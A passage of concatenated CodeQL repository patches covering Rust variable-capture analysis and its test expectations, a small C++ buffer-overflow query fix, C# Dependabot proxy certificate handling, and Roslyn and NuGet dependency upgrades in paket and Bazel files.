variables.rs:496:5:496:5 | a | variables.rs:492:13:492:13 | a | -| variables.rs:497:15:497:15 | a | variables.rs:492:13:492:13 | a | +| variables.rs:493:13:493:16 | self | variables.rs:490:23:490:26 | self | +| variables.rs:493:25:493:25 | n | variables.rs:491:22:491:22 | n | +| variables.rs:495:9:495:9 | f | variables.rs:491:17:491:17 | f | +| variables.rs:496:9:496:9 | f | variables.rs:491:17:491:17 | f | | variables.rs:502:15:502:15 | a | variables.rs:501:13:501:13 | a | | variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | | variables.rs:504:15:504:15 | a | variables.rs:501:13:501:13 | a | | variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | | variables.rs:506:15:506:15 | a | variables.rs:501:13:501:13 | a | -| variables.rs:511:20:511:20 | x | variables.rs:510:9:510:9 | x | -| variables.rs:512:15:512:15 | x | variables.rs:510:9:510:9 | x | -| variables.rs:515:20:515:20 | z | variables.rs:514:9:514:9 | z | -| variables.rs:524:6:524:9 | self | variables.rs:523:15:523:18 | self | -| variables.rs:530:3:530:3 | a | variables.rs:529:11:529:11 | a | -| variables.rs:532:13:532:13 | a | variables.rs:529:11:529:11 | a | +| variables.rs:511:15:511:15 | a | variables.rs:510:13:510:13 | a | +| variables.rs:512:5:512:5 | a | variables.rs:510:13:510:13 | a | +| variables.rs:513:15:513:15 | a | variables.rs:510:13:510:13 | a | +| variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | +| variables.rs:515:15:515:15 | a | variables.rs:510:13:510:13 | a | +| variables.rs:520:20:520:20 | x | variables.rs:519:9:519:9 | x | +| variables.rs:521:15:521:15 | x | variables.rs:519:9:519:9 | x | +| variables.rs:524:20:524:20 | z | variables.rs:523:9:523:9 | z | +| variables.rs:533:6:533:9 | self | variables.rs:532:15:532:18 | self | +| variables.rs:539:3:539:3 | a | variables.rs:538:11:538:11 | a | +| variables.rs:541:13:541:13 | a | variables.rs:538:11:538:11 | a | variableWriteAccess | variables.rs:23:5:23:6 | x2 | variables.rs:21:13:21:14 | x2 | | variables.rs:30:5:30:5 | x | variables.rs:28:13:28:13 | x | @@ -277,8 +288,8 @@ variableWriteAccess | variables.rs:438:9:438:9 | i | variables.rs:436:13:436:13 | i | | variables.rs:450:9:450:9 | x | variables.rs:446:13:446:13 | x | | variables.rs:454:9:454:9 | x | variables.rs:446:13:446:13 | x | -| variables.rs:496:5:496:5 | a | variables.rs:492:13:492:13 | a | | variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | +| variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | variableReadAccess | variables.rs:4:20:4:20 | s | variables.rs:3:14:3:14 | s | | variables.rs:8:20:8:20 | i | variables.rs:7:14:7:14 | i | @@ -410,18 +421,22 @@ variableReadAccess | variables.rs:472:19:472:19 | x | variables.rs:462:9:462:9 | x | | variables.rs:483:16:483:19 | self | variables.rs:482:20:482:23 | self | | variables.rs:487:9:487:12 | self | variables.rs:486:11:486:14 | self | -| variables.rs:493:15:493:15 | a | variables.rs:492:13:492:13 | a | -| variables.rs:494:5:494:5 | a | variables.rs:492:13:492:13 | a | -| variables.rs:495:15:495:15 | a | variables.rs:492:13:492:13 | a | -| variables.rs:497:15:497:15 | a | variables.rs:492:13:492:13 | a | +| variables.rs:493:13:493:16 | self | variables.rs:490:23:490:26 | self | +| variables.rs:493:25:493:25 | n | variables.rs:491:22:491:22 | n | +| variables.rs:495:9:495:9 | f | variables.rs:491:17:491:17 | f | +| variables.rs:496:9:496:9 | f | variables.rs:491:17:491:17 | f | | variables.rs:502:15:502:15 | a | variables.rs:501:13:501:13 | a | | variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | | variables.rs:504:15:504:15 | a | variables.rs:501:13:501:13 | a | | variables.rs:506:15:506:15 | a | variables.rs:501:13:501:13 | a | -| variables.rs:512:15:512:15 | x | variables.rs:510:9:510:9 | x | -| variables.rs:524:6:524:9 | self | variables.rs:523:15:523:18 | self | -| variables.rs:530:3:530:3 | a | variables.rs:529:11:529:11 | a | -| variables.rs:532:13:532:13 | a | variables.rs:529:11:529:11 | a | +| variables.rs:511:15:511:15 | a | variables.rs:510:13:510:13 | a | +| variables.rs:512:5:512:5 | a | variables.rs:510:13:510:13 | a | +| variables.rs:513:15:513:15 | a | variables.rs:510:13:510:13 | a | +| variables.rs:515:15:515:15 | a | variables.rs:510:13:510:13 | a | +| variables.rs:521:15:521:15 | x | variables.rs:519:9:519:9 | x | +| variables.rs:533:6:533:9 | self | variables.rs:532:15:532:18 | self | +| variables.rs:539:3:539:3 | a | variables.rs:538:11:538:11 | a | +| variables.rs:541:13:541:13 | a | variables.rs:538:11:538:11 | a | variableInitializer | variables.rs:16:9:16:10 | x1 | variables.rs:16:14:16:16 | "a" | | variables.rs:21:13:21:14 | x2 | variables.rs:21:18:21:18 | 4 | @@ -469,11 +484,12 @@ variableInitializer | variables.rs:437:9:437:13 | block | variables.rs:437:17:439:5 | { ... } | | variables.rs:446:13:446:13 | x | variables.rs:446:17:446:17 | 1 | | variables.rs:462:9:462:9 | x | variables.rs:462:13:462:13 | 1 | -| variables.rs:492:13:492:13 | a | variables.rs:492:17:492:35 | MyStruct {...} | -| variables.rs:501:13:501:13 | a | variables.rs:501:17:501:25 | [...] | -| variables.rs:510:9:510:9 | x | variables.rs:510:13:510:14 | 16 | -| variables.rs:514:9:514:9 | z | variables.rs:514:13:514:14 | 17 | -| variables.rs:529:11:529:11 | a | variables.rs:529:15:529:33 | MyStruct {...} | +| variables.rs:491:17:491:17 | f | variables.rs:491:21:494:9 | \|...\| ... | +| variables.rs:501:13:501:13 | a | variables.rs:501:17:501:35 | MyStruct {...} | +| variables.rs:510:13:510:13 | a | variables.rs:510:17:510:25 | [...] | +| variables.rs:519:9:519:9 | x | variables.rs:519:13:519:14 | 16 | +| variables.rs:523:9:523:9 | z | variables.rs:523:13:523:14 | 17 | +| variables.rs:538:11:538:11 | a | variables.rs:538:15:538:33 | MyStruct {...} | capturedVariable | variables.rs:400:9:400:9 | x | | variables.rs:410:13:410:13 | x | diff --git a/rust/ql/test/library-tests/variables/variables.rs b/rust/ql/test/library-tests/variables/variables.rs index 61bd3d72002..73d350f2496 100644 --- a/rust/ql/test/library-tests/variables/variables.rs +++ b/rust/ql/test/library-tests/variables/variables.rs @@ -486,6 +486,15 @@ impl MyStruct { fn id(self) -> Self { self // $ read_access=self } + + fn my_method(&mut self) { + let mut f = |n| { + // Capture of `self` + self.val += n; + }; + f(3); + f(4); + } } fn structs() { From d38975bb99b746bd6fd27e947279ad003d75d147 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Fri, 6 Dec 2024 13:07:58 +0000 Subject: [PATCH 0868/1267] C++: Use getType() instead of getUnderlyingType() --- cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql b/cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql index e89ffac906e..69e6e675aa0 100644 --- a/cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql +++ b/cpp/ql/src/Security/CWE/CWE-120/BadlyBoundedWrite.ql @@ -26,7 +26,7 @@ where bw.hasExplicitLimit() and // has an explicit size limit destSize = max(getBufferSize(bw.getDest(), _)) and bw.getExplicitLimit() > destSize and // but it's larger than the destination - not bw.getDest().getUnderlyingType().stripType() instanceof ErroneousType // destSize may be incorrect + not bw.getDest().getType().stripType() instanceof ErroneousType // destSize may be incorrect select bw, "This '" + bw.getBWDesc() + "' operation is limited to " + bw.getExplicitLimit() + " bytes but the destination is only " + destSize + " bytes." From ed68423d6eed6aa114240d2d51ee361e48a69b16 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Fri, 6 Dec 2024 14:12:27 +0100 Subject: [PATCH 0869/1267] Rust: Handle captured `self` parameter in variable implementation --- rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll | 5 ++++- rust/ql/test/library-tests/variables/Ssa.expected | 5 +++++ rust/ql/test/library-tests/variables/variables.expected | 2 ++ 3 files changed, 11 insertions(+), 1 deletion(-) diff --git a/rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll index c93fb2d832c..b21cf924204 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/VariableImpl.qll @@ -139,6 +139,9 @@ module Impl { */ IdentPat getPat() { variableDecl(definingNode, result, name) } + /** Gets the enclosing CFG scope for this variable declaration. */ + CfgScope getEnclosingCfgScope() { result = definingNode.getEnclosingCfgScope() } + /** Gets the `let` statement that introduces this variable, if any. */ LetStmt getLetStmt() { this.getPat() = result.getPat() } @@ -452,7 +455,7 @@ module Impl { Variable getVariable() { result = v } /** Holds if this access is a capture. */ - predicate isCapture() { this.getEnclosingCfgScope() != v.getPat().getEnclosingCfgScope() } + predicate isCapture() { this.getEnclosingCfgScope() != v.getEnclosingCfgScope() } override string toString() { result = name } diff --git a/rust/ql/test/library-tests/variables/Ssa.expected b/rust/ql/test/library-tests/variables/Ssa.expected index 714c5e34a4e..e126ca45c3a 100644 --- a/rust/ql/test/library-tests/variables/Ssa.expected +++ b/rust/ql/test/library-tests/variables/Ssa.expected @@ -136,7 +136,9 @@ definition | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | +| variables.rs:490:18:490:26 | SelfParam | variables.rs:490:23:490:26 | self | | variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | +| variables.rs:491:21:494:9 | self | variables.rs:490:23:490:26 | self | | variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | n | | variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | | variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | @@ -268,6 +270,7 @@ read | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | | variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:495:9:495:9 | f | | variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:496:9:496:9 | f | +| variables.rs:491:21:494:9 | self | variables.rs:490:23:490:26 | self | variables.rs:493:13:493:16 | self | | variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | n | variables.rs:493:25:493:25 | n | | variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:511:15:511:15 | a | | variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:512:5:512:5 | a | @@ -376,6 +379,7 @@ firstRead | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | | variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:495:9:495:9 | f | +| variables.rs:491:21:494:9 | self | variables.rs:490:23:490:26 | self | variables.rs:493:13:493:16 | self | | variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | n | variables.rs:493:25:493:25 | n | | variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:511:15:511:15 | a | | variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | variables.rs:515:15:515:15 | a | @@ -483,6 +487,7 @@ lastRead | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | | variables.rs:491:13:491:17 | f | variables.rs:491:17:491:17 | f | variables.rs:496:9:496:9 | f | +| variables.rs:491:21:494:9 | self | variables.rs:490:23:490:26 | self | variables.rs:493:13:493:16 | self | | variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | n | variables.rs:493:25:493:25 | n | | variables.rs:510:9:510:13 | a | variables.rs:510:13:510:13 | a | variables.rs:513:15:513:15 | a | | variables.rs:514:5:514:5 | a | variables.rs:510:13:510:13 | a | variables.rs:515:15:515:15 | a | diff --git a/rust/ql/test/library-tests/variables/variables.expected b/rust/ql/test/library-tests/variables/variables.expected index 63abece5a72..d0141b2e1e8 100644 --- a/rust/ql/test/library-tests/variables/variables.expected +++ b/rust/ql/test/library-tests/variables/variables.expected @@ -496,9 +496,11 @@ capturedVariable | variables.rs:418:13:418:13 | y | | variables.rs:426:13:426:13 | z | | variables.rs:436:13:436:13 | i | +| variables.rs:490:23:490:26 | self | capturedAccess | variables.rs:403:19:403:19 | x | | variables.rs:413:19:413:19 | x | | variables.rs:421:9:421:9 | y | | variables.rs:429:9:429:9 | z | | variables.rs:438:9:438:9 | i | +| variables.rs:493:13:493:16 | self | From 653d68ea9472b93be390545b27381c98ed7756da Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Fri, 6 Dec 2024 13:13:15 +0000 Subject: [PATCH 0870/1267] C#: Explicitly close writer in `DependabotProxy` --- .../DependabotProxy.cs | 1 + 1 file changed, 1 insertion(+) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index 09f5a15a21d..f3d92b38f0c 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -62,6 +62,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching using var writer = certFile.CreateText(); writer.Write(cert); + writer.Close(); logger.LogInfo($"Stored Dependabot proxy certificate at {result.CertificatePath}"); From c8ccfe40a550026411ecde0a8bc78b7486a4407e Mon Sep 17 00:00:00 2001 From: "Michael B. Gale" Date: Fri, 6 Dec 2024 13:13:41 +0000 Subject: [PATCH 0871/1267] C#: Create certificate from string, rather than file --- .../DependabotProxy.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs index f3d92b38f0c..895bd313ac3 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/DependabotProxy.cs @@ -66,7 +66,7 @@ namespace Semmle.Extraction.CSharp.DependencyFetching logger.LogInfo($"Stored Dependabot proxy certificate at {result.CertificatePath}"); - result.Certificate = new X509Certificate2(result.CertificatePath); + result.Certificate = X509Certificate2.CreateFromPem(cert); } return result; From 2816234359a47ae1142c190d3a847bb98217d216 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 4 Dec 2024 10:47:41 +0100 Subject: [PATCH 0872/1267] C#: Update Roslyn. --- csharp/paket.dependencies | 7 +- csharp/paket.lock | 156 +++++++++++++++++++++++--------------- csharp/paket.main.bzl | 60 +++++++-------- 3 files changed, 126 insertions(+), 97 deletions(-) diff --git a/csharp/paket.dependencies b/csharp/paket.dependencies index d3e2988bba6..824e2d73a83 100644 --- a/csharp/paket.dependencies +++ b/csharp/paket.dependencies @@ -4,7 +4,6 @@ source https://api.nuget.org/v3/index.json # behave like nuget in choosing transitive dependency versions strategy: min -nuget MessagePack >= 2.5.187 nuget Basic.CompilerLog.Util nuget Mono.Posix.NETStandard nuget Newtonsoft.Json @@ -12,9 +11,9 @@ nuget xunit nuget xunit.runner.visualstudio nuget xunit.runner.utility nuget Microsoft.NET.Test.Sdk -nuget Microsoft.CodeAnalysis.CSharp 4.9.2 -nuget Microsoft.CodeAnalysis 4.9.2 -nuget Microsoft.Build 17.8.3 +nuget Microsoft.CodeAnalysis.CSharp 4.12.0 +nuget Microsoft.CodeAnalysis 4.12.0 +nuget Microsoft.Build 17.12.6 nuget Microsoft.Win32.Primitives nuget System.Net.Primitives nuget System.Security.Principal diff --git a/csharp/paket.lock b/csharp/paket.lock index 1bfc7465d12..b80defd8c43 100644 --- a/csharp/paket.lock +++ b/csharp/paket.lock @@ -3,64 +3,99 @@ STRATEGY: MIN RESTRICTION: == net9.0 NUGET remote: https://api.nuget.org/v3/index.json - Basic.CompilerLog.Util (0.7.9) - MessagePack (>= 2.5.129) - Microsoft.CodeAnalysis (>= 4.9.2) - Microsoft.CodeAnalysis.CSharp (>= 4.9.2) - Microsoft.CodeAnalysis.VisualBasic (>= 4.9.2) - Microsoft.Extensions.ObjectPool (>= 7.0.13) - MSBuild.StructuredLogger (>= 2.2.235) + Basic.CompilerLog.Util (0.9.3) + MessagePack (>= 2.5.187) + Microsoft.CodeAnalysis (>= 4.11) + Microsoft.CodeAnalysis.CSharp (>= 4.11) + Microsoft.CodeAnalysis.VisualBasic (>= 4.11) + Microsoft.Extensions.ObjectPool (>= 9.0) + MSBuild.StructuredLogger (>= 2.2.243) + System.Buffers (>= 4.6) Humanizer.Core (2.14.1) - MessagePack (2.5.192) - MessagePack.Annotations (>= 2.5.192) + MessagePack (2.5.187) + MessagePack.Annotations (>= 2.5.187) Microsoft.NET.StringTools (>= 17.6.3) - MessagePack.Annotations (2.5.192) - Microsoft.Build (17.8.3) - Microsoft.Build.Framework (>= 17.8.3) - Microsoft.NET.StringTools (>= 17.8.3) - System.Collections.Immutable (>= 7.0) - System.Configuration.ConfigurationManager (>= 7.0) - System.Reflection.Metadata (>= 7.0) - System.Reflection.MetadataLoadContext (>= 7.0) - System.Security.Principal.Windows (>= 5.0) - System.Threading.Tasks.Dataflow (>= 7.0) - Microsoft.Build.Framework (17.8.3) + MessagePack.Annotations (2.5.187) + Microsoft.Bcl.AsyncInterfaces (8.0) + Microsoft.Build (17.12.6) + Microsoft.Build.Framework (>= 17.12.6) + Microsoft.NET.StringTools (>= 17.12.6) + System.Collections.Immutable (>= 8.0) + System.Configuration.ConfigurationManager (>= 8.0) + System.Reflection.Metadata (>= 8.0) + System.Reflection.MetadataLoadContext (>= 8.0) + Microsoft.Build.Framework (17.12.6) Microsoft.Build.Utilities.Core (17.5) Microsoft.Build.Framework (>= 17.5) Microsoft.NET.StringTools (>= 17.5) System.Collections.Immutable (>= 6.0) System.Configuration.ConfigurationManager (>= 6.0) - Microsoft.CodeAnalysis (4.9.2) - Microsoft.CodeAnalysis.CSharp.Workspaces (4.9.2) - Microsoft.CodeAnalysis.VisualBasic.Workspaces (4.9.2) + Microsoft.CodeAnalysis (4.12) + Humanizer.Core (>= 2.14.1) + Microsoft.Bcl.AsyncInterfaces (>= 8.0) + Microsoft.CodeAnalysis.Analyzers (>= 3.3.4) + Microsoft.CodeAnalysis.CSharp.Workspaces (4.12) + Microsoft.CodeAnalysis.VisualBasic.Workspaces (4.12) + System.Buffers (>= 4.5.1) + System.Collections.Immutable (>= 8.0) + System.Composition (>= 8.0) + System.IO.Pipelines (>= 8.0) + System.Memory (>= 4.5.5) + System.Numerics.Vectors (>= 4.5) + System.Reflection.Metadata (>= 8.0) + System.Runtime.CompilerServices.Unsafe (>= 6.0) + System.Text.Encoding.CodePages (>= 7.0) + System.Threading.Channels (>= 7.0) + System.Threading.Tasks.Extensions (>= 4.5.4) Microsoft.CodeAnalysis.Analyzers (3.3.4) - Microsoft.CodeAnalysis.Common (4.9.2) + Microsoft.CodeAnalysis.Common (4.12) Microsoft.CodeAnalysis.Analyzers (>= 3.3.4) System.Collections.Immutable (>= 8.0) System.Reflection.Metadata (>= 8.0) - System.Runtime.CompilerServices.Unsafe (>= 6.0) - Microsoft.CodeAnalysis.CSharp (4.9.2) - Microsoft.CodeAnalysis.Common (4.9.2) - Microsoft.CodeAnalysis.CSharp.Workspaces (4.9.2) + Microsoft.CodeAnalysis.CSharp (4.12) + Microsoft.CodeAnalysis.Analyzers (>= 3.3.4) + Microsoft.CodeAnalysis.Common (4.12) + System.Collections.Immutable (>= 8.0) + System.Reflection.Metadata (>= 8.0) + Microsoft.CodeAnalysis.CSharp.Workspaces (4.12) Humanizer.Core (>= 2.14.1) - Microsoft.CodeAnalysis.Common (4.9.2) - Microsoft.CodeAnalysis.CSharp (4.9.2) - Microsoft.CodeAnalysis.Workspaces.Common (4.9.2) - Microsoft.CodeAnalysis.VisualBasic (4.9.2) - Microsoft.CodeAnalysis.Common (4.9.2) - Microsoft.CodeAnalysis.VisualBasic.Workspaces (4.9.2) - Microsoft.CodeAnalysis.Common (4.9.2) - Microsoft.CodeAnalysis.VisualBasic (4.9.2) - Microsoft.CodeAnalysis.Workspaces.Common (4.9.2) - Microsoft.CodeAnalysis.Workspaces.Common (4.9.2) - Humanizer.Core (>= 2.14.1) - Microsoft.CodeAnalysis.Common (4.9.2) + Microsoft.CodeAnalysis.Analyzers (>= 3.3.4) + Microsoft.CodeAnalysis.Common (4.12) + Microsoft.CodeAnalysis.CSharp (4.12) + Microsoft.CodeAnalysis.Workspaces.Common (4.12) + System.Collections.Immutable (>= 8.0) System.Composition (>= 8.0) System.IO.Pipelines (>= 8.0) - System.Threading.Channels (>= 8.0) + System.Reflection.Metadata (>= 8.0) + System.Threading.Channels (>= 7.0) + Microsoft.CodeAnalysis.VisualBasic (4.12) + Microsoft.CodeAnalysis.Analyzers (>= 3.3.4) + Microsoft.CodeAnalysis.Common (4.12) + System.Collections.Immutable (>= 8.0) + System.Reflection.Metadata (>= 8.0) + Microsoft.CodeAnalysis.VisualBasic.Workspaces (4.12) + Humanizer.Core (>= 2.14.1) + Microsoft.CodeAnalysis.Analyzers (>= 3.3.4) + Microsoft.CodeAnalysis.Common (4.12) + Microsoft.CodeAnalysis.VisualBasic (4.12) + Microsoft.CodeAnalysis.Workspaces.Common (4.12) + System.Collections.Immutable (>= 8.0) + System.Composition (>= 8.0) + System.IO.Pipelines (>= 8.0) + System.Reflection.Metadata (>= 8.0) + System.Threading.Channels (>= 7.0) + Microsoft.CodeAnalysis.Workspaces.Common (4.12) + Humanizer.Core (>= 2.14.1) + Microsoft.CodeAnalysis.Analyzers (>= 3.3.4) + Microsoft.CodeAnalysis.Common (4.12) + System.Collections.Immutable (>= 8.0) + System.Composition (>= 8.0) + System.IO.Pipelines (>= 8.0) + System.Reflection.Metadata (>= 8.0) + System.Threading.Channels (>= 7.0) Microsoft.CodeCoverage (17.12) - Microsoft.Extensions.ObjectPool (7.0.13) - Microsoft.NET.StringTools (17.8.3) + Microsoft.Extensions.ObjectPool (9.0) + Microsoft.NET.StringTools (17.12.6) Microsoft.NET.Test.Sdk (17.12) Microsoft.CodeCoverage (>= 17.12) Microsoft.TestPlatform.TestHost (>= 17.12) @@ -75,12 +110,12 @@ NUGET Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) System.Runtime (>= 4.3) - Microsoft.Win32.SystemEvents (7.0) Mono.Posix.NETStandard (1.0) - MSBuild.StructuredLogger (2.2.235) + MSBuild.StructuredLogger (2.2.243) Microsoft.Build.Framework (>= 17.5) Microsoft.Build.Utilities.Core (>= 17.5) Newtonsoft.Json (13.0.3) + System.Buffers (4.6) System.Collections.Immutable (8.0) System.Composition (8.0) System.Composition.AttributedModel (>= 8.0) @@ -98,13 +133,10 @@ NUGET System.Composition.AttributedModel (>= 8.0) System.Composition.Hosting (>= 8.0) System.Composition.Runtime (>= 8.0) - System.Configuration.ConfigurationManager (7.0) - System.Diagnostics.EventLog (>= 7.0) - System.Security.Cryptography.ProtectedData (>= 7.0) - System.Security.Permissions (>= 7.0) - System.Diagnostics.EventLog (7.0) - System.Drawing.Common (7.0) - Microsoft.Win32.SystemEvents (>= 7.0) + System.Configuration.ConfigurationManager (8.0) + System.Diagnostics.EventLog (>= 8.0) + System.Security.Cryptography.ProtectedData (>= 8.0) + System.Diagnostics.EventLog (8.0) System.IO (4.3) Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) @@ -123,16 +155,18 @@ NUGET System.IO.FileSystem.Primitives (4.3) System.Runtime (>= 4.3) System.IO.Pipelines (8.0) + System.Memory (4.5.5) System.Net.Primitives (4.3.1) Microsoft.NETCore.Platforms (>= 1.1.1) Microsoft.NETCore.Targets (>= 1.1.3) System.Runtime (>= 4.3.1) System.Runtime.Handles (>= 4.3) + System.Numerics.Vectors (4.5) System.Reflection.Metadata (8.0) System.Collections.Immutable (>= 8.0) - System.Reflection.MetadataLoadContext (7.0) - System.Collections.Immutable (>= 7.0) - System.Reflection.Metadata (>= 7.0) + System.Reflection.MetadataLoadContext (8.0) + System.Collections.Immutable (>= 8.0) + System.Reflection.Metadata (>= 8.0) System.Runtime (4.3.1) Microsoft.NETCore.Platforms (>= 1.1.1) Microsoft.NETCore.Targets (>= 1.1.3) @@ -141,27 +175,23 @@ NUGET Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) System.Runtime (>= 4.3) - System.Security.Cryptography.ProtectedData (7.0) - System.Security.Permissions (7.0) - System.Windows.Extensions (>= 7.0) + System.Security.Cryptography.ProtectedData (8.0) System.Security.Principal (4.3) System.Runtime (>= 4.3) - System.Security.Principal.Windows (5.0) System.Text.Encoding (4.3) Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) System.Runtime (>= 4.3) - System.Threading.Channels (8.0) + System.Text.Encoding.CodePages (7.0) + System.Threading.Channels (7.0) System.Threading.Tasks (4.3) Microsoft.NETCore.Platforms (>= 1.1) Microsoft.NETCore.Targets (>= 1.1) System.Runtime (>= 4.3) - System.Threading.Tasks.Dataflow (7.0) + System.Threading.Tasks.Extensions (4.5.4) System.Threading.ThreadPool (4.3) System.Runtime (>= 4.3) System.Runtime.Handles (>= 4.3) - System.Windows.Extensions (7.0) - System.Drawing.Common (>= 7.0) xunit (2.9.2) xunit.analyzers (>= 1.16) xunit.assert (>= 2.9.2) diff --git a/csharp/paket.main.bzl b/csharp/paket.main.bzl index 2ec4e25c5f9..413bf68ddf3 100644 --- a/csharp/paket.main.bzl +++ b/csharp/paket.main.bzl @@ -7,64 +7,64 @@ def main(): nuget_repo( name = "paket.main", packages = [ - {"name": "Basic.CompilerLog.Util", "id": "Basic.CompilerLog.Util", "version": "0.7.9", "sha512": "sha512-Z50VRWQIXO0E8GM3ZFdL+Mq+YdmPh+OEJ7bDXPIsp1TQJB07i09WdlEb4MucSz9wG4exeLC3HGt23O3NOFL30g==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net462": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net47": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net471": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net472": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net48": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net5.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net6.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net7.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net8.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "net9.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", "Microsoft.Extensions.ObjectPool"], "netcoreapp2.1": ["MSBuild.StructuredLogger", "MessagePack", "Microsoft.CodeAnalysis", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.VisualBasic", 